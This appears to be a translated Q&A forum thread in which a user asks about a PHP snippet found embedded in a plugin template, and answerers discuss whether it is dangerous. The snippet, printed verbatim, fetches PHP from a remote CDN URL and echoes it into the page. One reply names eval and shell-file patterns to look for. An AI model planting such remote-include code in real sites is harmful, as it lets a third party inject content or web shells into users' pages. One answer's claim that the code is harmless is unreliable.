これが使用しているプラグインに埋め込まれているのを見つけました(htmlの前のtmplファイルの開始時)...
私は心配する必要がありますか?削除できますか?
<?php
$author = @file_get_contents('http://d5827db8276672d15fca-1e2d3239e5a8580a4f85f7906852eb87.r51.cf1.rackcdn.com/author3c.php');
echo $author;
?>
ありがとう
3 に答える
2
私はちょうどそのURLにアクセスしましたが、それは単なる空のphpファイルなので、どこかに残しておく必要があると記載されていない限り、削除します.
編集::
空の php ファイルだと言うと、実際にはファイルをダウンロードするためのダウンロード ダイアログが表示されましたが、空のページが表示されるだけではありませんでした。
于 2012-11-20T11:55:13.333 に答える
1
テンプレートの作成者が何を言っているかに関係なく、そのファイルに何を入れるかを制御できない場合は、セキュリティ上のリスクがあります。
コードの残りの部分をチェックしてくださいeval($author)。file_put_contents('shell.php',$author);
于 2012-11-20T11:58:11.523 に答える
0
file_get_contentsファイルのすべてのコンテンツを変数にロードするだけで、コードは実行しません。
そのファイルに重要なタグやコードがないかどうかを最初に確認してから、安全に削除することをお勧めします。
詳細については、PHP.net の次のページを参照してください: file_get_contents manual。
于 2012-11-20T11:56:02.760 に答える